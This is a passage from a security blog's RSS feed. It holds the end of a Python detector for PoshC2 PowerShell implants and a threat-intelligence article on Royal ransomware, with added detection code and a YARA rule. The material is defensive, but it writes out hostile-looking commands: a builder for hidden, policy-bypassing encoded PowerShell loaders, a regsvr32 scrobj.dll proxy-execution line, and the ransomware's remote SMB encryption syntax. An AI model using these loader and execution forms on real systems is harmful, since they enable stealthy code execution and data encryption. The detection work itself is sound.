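        r["proxy_binary"] = "mshta.exe"       # T1218.005
    elif "regsvr32" in low and "scrobj.dll" in low:
        r["proxy_binary"] = "regsvr32.exe"    # T1218.010
    inner = ""
    m = ENC_FLAG.search(cmdline)
    if m:
        b64 = m.group(1)
        r["long_encoded"] = len(b64) >= MIN_B64_LEN
        # Cheap check on the encoded form first: the prefix survives re-encoding.
        r["stable_prefix"] = b64.startswith(STABLE_PREFIX_B64)
        try:
            decoded = base64.b64decode(b64).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            decoded = ""
        inner = unpack_inner_script(decoded) or ""
        r["inner_script"] = inner or None
    r["fingerprints"] = [s for s in FINGERPRINT if s in inner]
    r["known_uris"] = [u for u in KNOWN_URIS if u in cmdline or u in inner]
    if r["stable_prefix"] or r["known_uris"] or len(r["fingerprints"]) >= 3:
        r["verdict"] = "poshc2"
    elif r["proxy_binary"] or r["long_encoded"]:
        r["verdict"] = "suspicious"
    else:
        r["verdict"] = "clean"
    return r


def build_sample_command(inner_script):
    """Constructed test input shaped like payload.bat: script -> gzip -> Base64 ->
    wrapped in the constant loader -> UTF-16LE -> Base64 after -e."""
    blob = base64.b64encode(gzip.compress(inner_script.encode("ascii"))).decode()
    loader = (STABLE_PREFIX + blob + "'),[IO.Compression.CompressionMode]::Decompress)),"
              "[Text.Encoding]::ASCII)).ReadToEnd()")
    enc = base64.b64encode(loader.encode("utf-16-le")).decode()
    return "powershell.exe -exec bypass -Noninteractive -windowstyle hidden -e " + enc


# Constructed stand-in for payload.txt: config lines quoted in the post plus a harmless body.
SAMPLE_INNER = ('[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}\n'
                '$urls=@("https://127.0.0.1")\n$curl="/cisben/marketq/"\n'
                "Write-Output 'constructed sample, not the implant'\n")
# Constructed benign encoded command for the negative case.
BENIGN_CMD = "powershell.exe -NoProfile -e " + base64.b64encode(
    "Get-ChildItem C:\\Windows\\Temp | Where-Object { $_.Length -gt 1MB } | Select-Object Name"
    .encode("utf-16-le")).decode()

if __name__ == "__main__":
    for line in (build_sample_command(SAMPLE_INNER), BENIGN_CMD,
                 "regsvr32 /s /n /u /i:https://127.0.0.1/Philips/v902/_rg scrobj.dll"):
        res = analyze(line)
        print(res["verdict"], res["proxy_binary"], res["fingerprints"], res["known_uris"])
```

Because `-e` takes the UTF-16LE text Base64-encoded, `STABLE_PREFIX_B64` is the same "SQBFAFgAKABO…" string that opens every payload.bat shown above, so the prefix test needs no decoding at all.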
The last section analyzed the PowerShell implant and detailed the underlying logic.</span></p>
<p>Throughout the whole article, we identified the following IoCs to detect PoshC2 PowerShell implants:</p>
<ol>
<li>Usage of the System Binary Proxy Execution technique (MITRE ID <a href="https://attack.mitre.org/techniques/T1218/">T1218</a>).</li>
<li>Presence of PoshC2-specific keywords (URIs from urls.txt; code snippets; Base64 strings).</li>
<li>Execution of powershell.exe with long Base64-encoded commands.</li>
<li>Usage of self-signed SSL certificates in network communications.</li>
</ol>
<p>To help security researchers, we created YARA rules for the PowerShell stager and the PowerShell implant. They are all available <a href="https://github.com/vmware-samples/tau-research">in our repository</a>.</p><p>The post <a rel="nofollow" href="https://blogs.vmware.com/security/2023/03/how-to-detect-poshc2-powershell-implants.html">How to Detect PoshC2 PowerShell Implants</a> appeared first on <a rel="nofollow" href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]> ... </content:encoded> ... 
</item> <item> <title>Unveiling the Evolution of Royal Ransomware</title> <link>https://blogs.vmware.com/security/2023/03/unveiling-the-evolution-of-royal-ransomware.html?utm_source=rss&utm_medium=rss&utm_campaign=unveiling-the-evolution-of-royal-ransomware</link> <dc:creator> <![CDATA[ Deborah Snyder, Tatiana Vollbrecht, Kyle Shafto and Dana Behling ]]> ... </dc:creator> <pubDate>Thu, 16 Mar 2023 20:11:57 +0000</pubDate> <category> <![CDATA[ Threat Intelligence ]]> ... </category> <guid isPermaLink="false">https://blogs.vmware.com/security/?p=83390</guid> <description> <![CDATA[ <div><img width="300" height="162" src="https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-300x162.png" class="attachment-medium size-medium wp-post-image" alt="" decoding="async" loading="lazy" style="margin-bottom: 10px;" srcset="https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-300x162.png 300w, https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-1024x555.png 1024w, https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-768x416.png 768w, https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-1536x832.png 1536w, https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-410x222.png 410w, https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-600x325.png 600w, https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-415x225.png 415w, https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-585x318.png 585w, https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-380x207.png 380w, https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-222x120.png 222w, https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured.png 1710w" sizes="(max-width: 300px) 100vw, 300px" /></div> <p>While the evolution of ransomware techniques is to be expected, the speed at which the Royal Ransomware Group has been able to adapt 
is impressive. Since it was first reported, those responsible for Royal ransomware have advanced quickly over a short period of time, leveraging old and new techniques as well as exploiting novel vulnerabilities … <a href="https://blogs.vmware.com/security/2023/03/unveiling-the-evolution-of-royal-ransomware.html">Continued</a></p> <p>The post <a rel="nofollow" href="https://blogs.vmware.com/security/2023/03/unveiling-the-evolution-of-royal-ransomware.html">Unveiling the Evolution of Royal Ransomware</a> appeared first on <a rel="nofollow" href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]> ... </description> <content:encoded> <![CDATA[ <div><img width="300" height="162" src="https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-300x162.png" class="attachment-medium size-medium wp-post-image" alt="" decoding="async" loading="lazy" style="margin-bottom: 10px;" srcset="https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-300x162.png 300w, https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-1024x555.png 1024w, https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-768x416.png 768w, https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-1536x832.png 1536w, https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-410x222.png 410w, https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-600x325.png 600w, https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-415x225.png 415w, https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-585x318.png 585w, https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-380x207.png 380w, https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-222x120.png 222w, https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured.png 1710w" sizes="(max-width: 300px) 100vw, 300px" /></div><p>While the evolution of ransomware techniques is to be 
expected, the speed at which the Royal Ransomware Group has been able to adapt is impressive. Since it was first reported, those responsible for Royal ransomware have advanced quickly over a short period of time, leveraging old and new techniques as well as exploiting novel vulnerabilities as they are discovered. In just the last six months, they have rapidly escalated attacks targeting victims across numerous industries and countries.</p> <p>The Royal Ransomware Group has also leveraged evasion techniques such as Virtual Instances <a href="https://attack.mitre.org/techniques/T1564/006/">[1]</a>, which made it challenging for defenders to prevent encryption once the threat actor had gained access to the targeted victim environment. Interestingly, some of the attributes were reminiscent of an older 2020 sample of Conti ransomware. External research by Vitali Kremez from AdvIntel has stated a direct relationship between Conti and Royal ransomware [<a href="https://twitter.com/VK_Intel/status/1557003350541242369">2</a>]. Comparing a recent Royal sample against Conti’s and other Royal ransomware variants over the past six months could provide insight into the threat actors’ future activity.</p> <h2><strong>Who is Royal Ransomware?</strong></h2> <p>Initially identified as Zeon in January of 2022, Royal ransomware has been rebranded as “Royal” since September of 2022 <a href="https://www.bleepingcomputer.com/news/security/ransomware-gangs-move-to-callback-social-engineering-attacks/">[3]</a>. Since then, they have targeted companies across numerous industries such as Manufacturing, Healthcare, Food, and Education. 
Although over 60% of targeted companies have been in the United States, the Royal Ransomware Group has not shied away from targeting organizations around the world, including in Europe and Latin America.</p> <p><a href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.03.37-PM.png"><img decoding="async" loading="lazy" class="alignnone wp-image-83398" src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.03.37-PM-1024x416.png" alt="" width="800" height="325" srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.03.37-PM-1024x416.png 1024w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.03.37-PM-300x122.png 300w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.03.37-PM-768x312.png 768w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.03.37-PM-1536x624.png 1536w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.03.37-PM-600x244.png 600w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.03.37-PM.png 1606w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><strong><em>Figure 1: </em></strong><em>Graph of Industries Targeted by the Royal Ransomware Group collected via their Leak Site from September 2022 – February 2023.</em></p> <p>Over the past six months, the Royal Ransomware Group has targeted both small and large companies. In December of 2022, there appeared to be a clear pivot to targeting larger companies and a steady decline in targeting smaller organizations. 
There has also been an overall decline in the number of reported attacks in the first quarter of 2023.</p> <p><em><a href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.02.48-PM.png"><img decoding="async" loading="lazy" class="alignnone wp-image-83397" src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.02.48-PM-1024x634.png" alt="" width="800" height="495" srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.02.48-PM-1024x634.png 1024w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.02.48-PM-300x186.png 300w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.02.48-PM-768x475.png 768w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.02.48-PM-1536x950.png 1536w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.02.48-PM-600x371.png 600w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.02.48-PM.png 1584w" sizes="(max-width: 800px) 100vw, 800px" /></a></em></p> <p><strong><em>Figure 2:</em></strong><em> Line Chart summarizing the Size of Targeted Companies collected via their Leak Site from September 2022 – February 2023. 
</em></p> <p>Each new variant of Royal ransomware since September has brought different techniques and features, old and new, such as:</p> <ul> <li>Callback phishing (BazarCall) <a href="https://www.bleepingcomputer.com/news/security/ransomware-gangs-move-to-callback-social-engineering-attacks/">[3]</a></li> <li>File encryption over SMB</li> <li>Expansive LOLbin utilization</li> <li>Rapid abuse of new vulnerabilities such as CVE-2022-27510 <a href="https://www.techrepublic.com/article/royal-ransomware-linux-vmware-esxi/">[4]</a></li> <li>Leveraging popular malware and tools such as Qbot, Batloader, Cobalt Strike, etc.</li> </ul> <p><a href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.01.41-PM.png"><img decoding="async" loading="lazy" class="alignnone wp-image-83396" src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.01.41-PM-1024x372.png" alt="" width="800" height="290" srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.01.41-PM-1024x372.png 1024w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.01.41-PM-300x109.png 300w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.01.41-PM-768x279.png 768w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.01.41-PM-1536x558.png 1536w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.01.41-PM-600x218.png 600w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.01.41-PM.png 1548w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><strong><em>Figure 3:</em></strong><em> Timeline of major changes observed with Royal ransomware over the last six months as reported by security researchers [</em><a href="https://www.bleepingcomputer.com/news/security/ransomware-gangs-move-to-callback-social-engineering-attacks/"><em>3</em></a><em>] [</em><a 
href="https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html"><em>8</em></a><em>]</em></p> <h2>A Royal Delivery</h2> <p>VMware Carbon Black’s Threat Analysis Unit (TAU) recently investigated a Royal ransomware attack that used file encryption over SMB. The threat actor gained access to a customer’s environment and remotely encrypted files across five devices. Unlike previously reported Royal intrusions <a href="https://www.kroll.com/en/insights/publications/cyber/royal-ransomware-deep-dive">[5]</a>, the threat actor neither disabled the antivirus/EDR nor deleted volume shadow copies. These steps may have been skipped to avoid alerting sensors or being blocked, but the sample itself is capable of deleting volume shadow copies.</p> <p>Carbon Black was informed that the threat actor first gained access to Server A and spun up a Virtual Machine (VM). 
From that VM, they connected back to the host over SMB, as well as to five additional servers.</p> <p><a href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.59.54-PM.png"><img decoding="async" loading="lazy" class="alignnone wp-image-83395" src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.59.54-PM.png" alt="" width="800" height="421" srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.59.54-PM.png 940w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.59.54-PM-300x158.png 300w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.59.54-PM-768x404.png 768w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.59.54-PM-600x316.png 600w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><strong><em>Figure 4:</em></strong><em> Diagram summarizing the flow of events in the Royal ransomware attack in the customer environment.</em></p> <p>Shortly after gaining access to each server, the remote file encryption began. Royal ransomware must be launched from the command line by a threat actor who is active within the target environment. To encrypt a server remotely, the threat actor supplies the target IP address and drive on the command line:</p> <p><code>[RansomwareName].exe -ep 5 -path \\XXX.XXX.XXX.XXX\C$ -id [32 char string]</code></p> <p>On the target server this resembles routine SMB file activity. And because the threat actor worked from a newly created VM with no sensor installed, some malicious activity on that device could go undetected.</p> <h2>Conti Ransomware in Retrospect</h2> <p>The investigated Royal ransomware attack revealed features previously identified in Conti ransomware [<a href="https://blogs.vmware.com/security/2020/07/tau-threat-discovery-conti-ransomware.html">6</a>]. 
Like Royal ransomware, Conti is designed to be executed by an adversary who is actively monitoring the environment. In 2020, it used similar command line execution to target local drives, network shares, and even specific IP addresses. Deeper analysis revealed numerous similarities between the 2020 Conti sample and our 2023 Royal sample.</p> <p><a href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.58.52-PM.png"><img decoding="async" loading="lazy" class="alignnone wp-image-83394" src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.58.52-PM.png" alt="" width="800" height="638" srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.58.52-PM.png 799w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.58.52-PM-300x239.png 300w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.58.52-PM-768x612.png 768w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.58.52-PM-600x478.png 600w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><strong><em>Figure 5:</em></strong><em> Venn diagram comparing the 2020 Conti sample with the 2023 Royal ransomware sample </em>[<a href="https://blogs.vmware.com/security/2020/07/tau-threat-discovery-conti-ransomware.html">6</a>]</p> <p>The most notable shared features are:</p> <ul> <li>Multi-threaded encryption to speed up the process</li> <li>Windows Restart Manager to kill processes holding files open before encryption</li> <li>Network scanning to identify network shares for encryption</li> <li>Filtering of IP addresses to reduce noise</li> <li>File encryption over SMB</li> <li>Command line execution with the ability to specify local or network-only targets</li> </ul> <p>One key difference is that the 2020 Conti sample was heavily obfuscated, using a Conti mutex and unique encoding strings for API resolution, while the 2023 Royal sample had no mutex and often carried commands in clear text. This may be a consequence of the Conti source code leak: there is little point spending cycles obfuscating code that is already public.</p> <h2>Where is Royal Now?</h2> <p>Compared to a sample <a href="https://www.cybereason.com/blog/royal-ransomware-analysis">[7]</a> seen in late 2022, our Royal sample added two command line arguments, two additional file extensions to skip during encryption, and a modified extension appended to encrypted files. The new arguments, “-localonly” and “-networkonly”, let the operator target only the local host, or only scan and target network shares, instead of relying on a specified path.</p> <p><a href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.57.55-PM.png"><img decoding="async" loading="lazy" class="alignnone wp-image-83393" src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.57.55-PM.png" alt="" width="800" height="111" srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.57.55-PM.png 907w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.57.55-PM-300x42.png 300w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.57.55-PM-768x107.png 768w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.57.55-PM-600x83.png 600w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><strong><em>Figure 6:</em></strong><em> Screenshot of the added command line arguments</em></p> <p>The skipped file extensions were “.royal_w” and “.royal_u”. The “.royal_w” extension is appended to files after encryption (earlier Royal samples used plain “.royal”), while the purpose of “.royal_u” was not yet understood. 
It’s possible this change was made to evade detection rules written on the earlier indicator.</p> <p>More recently, a new variant <a href="https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html">[8]</a> was identified targeting Linux ESXi servers. This variant appends “.royal_u” to encrypted files, the extension foreshadowed in our sample. It replaced the “-localonly” and “-networkonly” command line arguments with new ones such as “stopvm” and added more file extension exclusions.</p> <p><a href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.57.19-PM.png"><img decoding="async" loading="lazy" class="alignnone size-full wp-image-83392" src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.57.19-PM.png" alt="" width="331" height="208" srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.57.19-PM.png 331w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.57.19-PM-300x189.png 300w" sizes="(max-width: 331px) 100vw, 331px" /></a></p> <p><strong><em>Figure 7:</em></strong><em> Screenshot of the .royal_u extension used by the Linux variant, already present in our sample</em></p> <h2>Detecting a Constantly Evolving Threat</h2> <p>The Royal Ransomware Group is clearly comfortable adjusting and evolving its ransomware to fit its targets’ environments. With three different variants in three months, staying aware of these changes is essential to maintaining detection.</p> <p>When executed locally, Royal ransomware is blocked by the Carbon Black EDR product’s default ransomware policies for sensor versions 3.7 and up. 
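</p> <p>The remote path is the one a sensor on the operator’s VM will not see, so it pays to check both ends of it. The following Python is an added example, not code from the VMware post or from Carbon Black: it parses a process command line for the argument set shown in “A Royal Delivery” (including the “-localonly” and “-networkonly” switches of the 2023 sample), and it looks for an encryption burst in constructed Windows Security event 5145 (detailed file share access) records on the target server, where the source VM’s writes to C$ are still visible. The flattened record layout, the IP addresses, file names, window and threshold are all assumptions.</p>

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# ---- 1. Source side: the command line the operator types -------------------
# Switches documented in the post: -ep <n> -path <target> -id <32 chars>,
# plus the -localonly / -networkonly scope switches added in the 2023 sample.
VALUE_SWITCHES = ("-ep", "-path", "-id")
FLAG_SWITCHES = ("-localonly", "-networkonly")

# UNC path to an administrative share, e.g. \\10.0.0.5\C$ or \\srv01\ADMIN$
ADMIN_SHARE_RE = re.compile(
    r"^\\\\(?P<host>[^\\]+)\\(?P<share>(?:[A-Za-z]|ADMIN)\$)(?:\\|$)", re.IGNORECASE)


def parse_royal_args(cmdline):
    """Split on whitespace (assumption: the observed paths contain no spaces)
    and collect the recognised switches; anything else is ignored."""
    tokens = cmdline.split()
    found = {}
    i = 1                                  # tokens[0] is the image name
    while i < len(tokens):
        tok = tokens[i].lower()
        if tok in VALUE_SWITCHES and i + 1 < len(tokens):
            found[tok] = tokens[i + 1]
            i += 2
        elif tok in FLAG_SWITCHES:
            found[tok] = True
            i += 1
        else:
            i += 1
    return found


def royal_cmdline_reasons(cmdline):
    """Return the indicators present in a command line; the caller decides
    how many are needed (the post's command line yields three)."""
    args = parse_royal_args(cmdline)
    reasons = []
    if str(args.get("-ep", "")).isdigit():
        reasons.append("numeric -ep value")
    if len(str(args.get("-id", ""))) == 32:
        reasons.append("32-character -id value")
    m = ADMIN_SHARE_RE.match(str(args.get("-path", "")))
    if m:
        reasons.append("remote target %s on %s" % (m.group("share"), m.group("host")))
    if any(f in args for f in FLAG_SWITCHES):
        reasons.append("-localonly/-networkonly scope switch")
    return reasons


# ---- 2. Target side: Windows Security event 5145 on the encrypted server ---
# Constructed, flattened record layout (assumption; real events are XML):
#   time=<ISO 8601> ip=<client> share=<name> target=<relative path> mask=<hex>
REC_RE = re.compile(r"time=(\S+) ip=(\S+) share=(\S+) target=(.+) mask=(0x[0-9A-Fa-f]+)$")
WRITE_DATA, DELETE = 0x2, 0x10000          # AccessMask bits that change a file


def parse_5145(line):
    m = REC_RE.match(line.strip())
    if not m:
        raise ValueError("unrecognised record: %r" % line)
    t, ip, share, target, mask = m.groups()
    return {"time": datetime.fromisoformat(t), "ip": ip, "share": share,
            "target": target, "mask": int(mask, 16)}


def remote_encryption_bursts(lines, window_s=60, threshold=20):
    """Flag a client that writes to or deletes at least `threshold` distinct
    files on one administrative share within `window_s` seconds.
    Returns a list of (client_ip, share, distinct_files)."""
    per_client = defaultdict(list)
    for rec in map(parse_5145, lines):
        if not re.fullmatch(r"[A-Za-z]\$", rec["share"]):
            continue                       # only admin shares such as C$
        if not rec["mask"] & (WRITE_DATA | DELETE):
            continue                       # reads are normal share traffic
        per_client[(rec["ip"], rec["share"])].append((rec["time"], rec["target"]))

    window = timedelta(seconds=window_s)
    hits = []
    for (ip, share), evs in per_client.items():
        evs.sort()
        best, start = 0, 0
        for end in range(len(evs)):        # sliding window over sorted events
            while evs[end][0] - evs[start][0] > window:
                start += 1
            best = max(best, len({t for _, t in evs[start:end + 1]}))
        if best >= threshold:
            hits.append((ip, share, best))
    return hits


def sample_records():
    """Constructed audit lines: 10.0.0.50 rewrites 25 files on C$ within 25 seconds,
    while 10.0.0.7 only reads a few files on an ordinary share."""
    base = datetime(2023, 3, 1, 2, 15, 0)
    lines = ["time=%s ip=10.0.0.50 share=C$ target=Users\\alice\\Documents\\file%02d.docx mask=0x12019F"
             % ((base + timedelta(seconds=i)).isoformat(), i) for i in range(25)]
    lines += ["time=%s ip=10.0.0.7 share=shared target=Reports\\q1 summary.xlsx mask=0x120089"
              % (base + timedelta(seconds=10 * i)).isoformat() for i in range(3)]
    return lines


if __name__ == "__main__":
    print(royal_cmdline_reasons(r"royal.exe -ep 5 -path \\10.0.0.5\C$ -id " + "a" * 32))
    print(remote_encryption_bursts(sample_records()))
```

<p>The command line check is deliberately a set of independent reasons rather than a fixed signature, since the post shows the switch set changing between variants; the share-access check needs the “Detailed File Share” audit subcategory enabled on the file server, and its threshold should be tuned against the server’s normal write rate before it is used for alerting.</p> <p>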
However, in the case of file encryption over SMB or execution from a virtual machine, EDR products may not have full visibility into portions of the network activity.</p> <p>The Endpoint Standard product receives updates for known malicious hashes and blocks known or suspect malware files from executing through behavioral analysis. While the initial execution may circumvent detection by running inside a virtual machine, the malware is likely to trigger additional alerts as it runs that indicate a more complex attack. This is a good reminder to ensure detection coverage across the entire environment, so that even if some malicious activity goes undetected on one device, it is still blocked when the threat actor acts against other devices.</p> <p>With evolving threats like these, products like VMware Carbon Black’s Managed Detection and Response (MDR) can be the difference between a fully encrypted network and a contained threat, adding a much-needed human element that can react to a changing environment daily. The MDR team consists of highly trained analysts who specialize in post-exploitation defense. The team tracks technique changes and fills a crucial gap between sensor and hash reputation updates, dramatically reducing the turnaround time for detecting emerging threats. 
For Royal ransomware in particular, the MDR team has used insight gained across our customer pool to automate proactive threat-hunting queries, which has helped customers contain the threat early in the initial infection, minimizing network impact and preventing data exfiltration.</p> <p><a href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.56.00-PM.png"><img decoding="async" loading="lazy" class="alignnone wp-image-83391" src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.56.00-PM.png" alt="" width="800" height="407" srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.56.00-PM.png 843w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.56.00-PM-300x153.png 300w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.56.00-PM-768x391.png 768w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.56.00-PM-600x305.png 600w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><strong><em>Figure 8:</em></strong><em> Screenshot of the Carbon Black Console summary of alert behaviors</em></p> <h2>Conclusion</h2> <p>The threat landscape always evolves, but Royal ransomware in particular warrants close attention. With victims across numerous industries and countries, the Royal Ransomware Group has shown itself to be pervasive, resourceful and creative in its implementations. By combining old and new techniques, and now expanding to Linux, it has vastly increased its pool of potential targets. 
More adaptations in future variants should be expected.</p> <p>In fact, after finishing our investigation, our team detected in a more recent Royal ransomware variant a technique that researchers at Red Canary [<a href="https://redcanary.com/blog/detecting-msxsl-attacks/">10</a>] had noted back in 2018, involving the signed Microsoft binary MSXSL.</p> <h2><strong>Yara Rule</strong></h2> <pre><code>rule royal_note_cmdln_fileext
{
    meta:
        author = "Carbon Black TAU" // bdana & snyderd
        date = "2023-Feb-28"
        description = "Identifies Royal Ransomware Variant with -localonly and -networkonly options available for command line execution"
        rule_version = 1
        yara_version = "4.2.0"
        exemplar_hash = "972429ab773f3f31180430f6fedc8b93b43f0f8d49b9e2d0ef22ac8589744648"

    strings:
        $ransom_note = "If you are reading this, it means that your system were hit by Royal ransomware." ascii wide
        $cmdline_1 = "-path" ascii wide
        $cmdline_2 = "-id" ascii wide
        $cmdline_3 = "-ep" ascii wide
        $cmdline_4 = "-localonly" ascii wide
        $cmdline_5 = "-networkonly" ascii wide
        $file_ext_1 = ".royal_u" ascii wide
        $file_ext_2 = ".royal_w" ascii wide

    condition:
        all of them
}</code></pre> <p><strong>References</strong></p> <p>[1] <a href="https://attack.mitre.org/techniques/T1564/006/">Hide Artifacts: Run Virtual Instance, Sub-technique T1564.006 – Enterprise | MITRE ATT&CK®</a></p> <p>[2] <a href="https://twitter.com/VK_Intel/status/1557003350541242369">Vitali Kremez Mind Map</a></p> <p>[3] <a href="https://www.bleepingcomputer.com/news/security/ransomware-gangs-move-to-callback-social-engineering-attacks/">Ransomware gangs move to ‘callback’ social engineering attacks</a></p> <p>[4] <a 
href="https://www.techrepublic.com/article/royal-ransomware-linux-vmware-esxi/">Royal ransomware spreads to Linux and VMware ESXi</a></p> <p>[5] <a href="https://www.kroll.com/en/insights/publications/cyber/royal-ransomware-deep-dive">Royal Ransomware Deep Dive | Kroll</a></p> <p>[6] <a href="https://blogs.vmware.com/security/2020/07/tau-threat-discovery-conti-ransomware.html">TAU Threat Discovery: Conti Ransomware – VMware Security Blog</a></p> <p>[7] <a href="https://www.cybereason.com/blog/royal-ransomware-analysis">Royal Rumble: Analysis of Royal Ransomware</a></p> <p>[8] <a href="https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html">Royal Ransomware Expands Attacks by Targeting Linux ESXi Servers</a></p> <p>[9] <a href="https://www.bleepingcomputer.com/news/security/new-royal-ransomware-emerges-in-multi-million-dollar-attacks/">New Royal Ransomware emerges in multi-million dollar attacks</a></p> <p>[10] <a href="https://redcanary.com/blog/detecting-msxsl-attacks/">Detecting MSXSL Abuse in the Wild</a></p> <p> </p> <p> </p><p>The post <a rel="nofollow" href="https://blogs.vmware.com/security/2023/03/unveiling-the-evolution-of-royal-ransomware.html">Unveiling the Evolution of Royal Ransomware</a> appeared first on <a rel="nofollow" href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]> ... </content:encoded> ... </item> ... </channel> ... </rss>